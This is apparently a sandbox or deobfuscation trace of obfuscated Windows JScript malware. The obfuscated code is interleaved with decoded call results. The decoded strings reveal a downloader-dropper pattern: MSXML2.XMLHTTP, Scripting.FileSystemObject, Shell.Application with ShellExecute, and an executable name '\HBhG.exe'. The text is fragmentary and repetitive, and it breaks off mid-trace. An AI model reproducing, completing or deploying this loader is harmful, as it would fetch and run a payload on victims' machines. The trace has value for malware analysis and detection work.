                                                                                    • _0x1523() ➔ 536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application,WO41qK7cRvBcISoBWQBcVJxcMW
                                                                                    • _0x1523() ➔ ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application,WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV
                                                                                    21
                                                                                    return _0x560f =
                                                                                      22
                                                                                      function (_0x4e7b52, _0x4146f5) {
                                                                                      • _0x560f(275,undefined) ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                      • _0x560f(261,undefined) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                      • _0x560f(258,undefined) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                      • _0x560f(262,undefined) ➔ "Close"
                                                                                      • _0x560f(279,undefined) ➔ "WRCRf8oCW5a"
                                                                                      • _0x560f(259,undefined) ➔ "24cwPSlC"
                                                                                      • _0x560f(270,undefined) ➔ "gCk/WPVdMa"
                                                                                      • _0x560f(275,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                      • _0x560f(261,undefined) ➔ "Close"
                                                                                      • _0x560f(275,undefined) ➔ "7728888BzvkvV"
                                                                                      23
                                                                                      _0x4e7b52 = _0x4e7b52 - 0xfe;
                                                                                        24
                                                                                        var _0x300c1d = _0x152d41[_0x4e7b52];
                                                                                          25
                                                                                          return _0x300c1d;
                                                                                            26
                                                                                            }, _0x560f ( _0x21316b, _0x2c7673 );
                                                                                              27
                                                                                              }
                                                                                                28
                                                                                                var _0x106d34 = _0x560f, _0x2bbb97 = _0x9bc2;
                                                                                                  29
                                                                                                  function _0x4251(_0x5bb6db, _0x386215) {
                                                                                                  • _0x4251(414) ➔ "fromCharCode"
                                                                                                  • _0x4251(431) ➔ "hCktg8kKD8ou"
                                                                                                  • _0x4251(392) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                                                                  • _0x4251(389) ➔ "WRCRf8oCW5a"
                                                                                                  • _0x4251(419) ➔ "FnVtWB"
                                                                                                  • _0x4251(369) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                                                                  • _0x4251(397) ➔ "UGpDBa"
                                                                                                  • _0x4251(429) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                  • _0x4251(373) ➔ "push"
                                                                                                  • _0x4251(414) ➔ "233387pUFHvh"
    var _0x2a78ae = _0x2a78 ( );
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                  • _0x2a78() ➔ EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w,ymkUWO3cOMS
    return _0x4251 = function (_0x4251a9, _0xdf85fb) {
                                                                                                    • _0x4251(414,undefined) ➔ "fromCharCode"
                                                                                                    • _0x4251(431,undefined) ➔ "hCktg8kKD8ou"
                                                                                                    • _0x4251(392,undefined) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                                                                    • _0x4251(389,undefined) ➔ "WRCRf8oCW5a"
                                                                                                    • _0x4251(419,undefined) ➔ "FnVtWB"
                                                                                                    • _0x4251(369,undefined) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                                                                    • _0x4251(397,undefined) ➔ "UGpDBa"
                                                                                                    • _0x4251(429,undefined) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                    • _0x4251(373,undefined) ➔ "push"
                                                                                                    • _0x4251(414,undefined) ➔ "233387pUFHvh"
        _0x4251a9 = _0x4251a9 - 0x170;
        var _0x117c39 = _0x2a78ae[_0x4251a9];
        return _0x117c39;
    }, _0x4251 ( _0x5bb6db, _0x386215 );
}
function _0x2a78() {
                                                                                                              • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                              var _0x406d6d = [ 'ymkUWO3cOMS', 'EmosWRVcNSolFa1ihmofWPhcNa', '150UECBKi', 'W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu', '3428070zJPwOJ', 'push', '460031zEcYIe', 'W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44', 'huCPtt7cSW', 'WOatz8o9qCoYWQfjgNhcGsLT', 'charCodeAt', 'open', 'EXVdUmoNWQ0', 'hXuIWQxcSSkWm8khW5/dHCkY', '7728888BzvkvV', 'W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa', 'WP/cHWdcICk+W6CiFCoVWRWwjG', 'W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC', 'bCkhC8onW4FcLI0+WRxcGCkgrG', 'SC!i', 'XaOX', 'WRCRf8oCW5a', '4rmKgck', 'hSkNWP3dMdulzwhcT0e', 'WQldKJpcNSkZwCohW7uuzCkoW4i', '368895bdoymb', 'B@T8', '\x5cHBhG.exe', 'length', 'UGpDBa', '125536oJLPHF', 'k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm', 'kmoTW4ztcXLxhCoX', 'bCokgSoo', 'rSkfWPtcHuXF', 'Scripting.FileSystemObject', 'WRddHhdcKMu', 'ShellExecute', 'mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq', 'WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa', 'W7lcNYddGYNdT8kiorm2WOJdSa', 'cWreW7NdIea', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=', 'F8kIdw8uWQKJssddISkJW51zcW', 'W67dRx/dVCo6W58', 'WRxcISkFh8o1z8oeC8k8hq', 'fromCharCode', '233387pUFHvh', 'W7FdRgXdW54Tna', 'emk4WPhcOa', 'nvObFWhcVG', 'FnVtWB', '1626000eqHoJP', 'W7KZbhbjW45FW7NdIcfsW4m', 'hLEa', 'QJRI', 'ubKmW5ivxZ9hW6i', 'DbyQW4fCh8kdWOldQmkxWPWz', 'p3(5', 'WRajWQNcSqVcSNa2Bb7dJCkN', 'Open', 'W5S9W7KHWQtdJMhdSGpcIKnHWPun', '54TmlaBs', 'hCktg8kKD8ou', '796884wfZlXM', 'AR2w' ];
    _0x2a78 = function () {
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                  • _0x2a78() ➔ 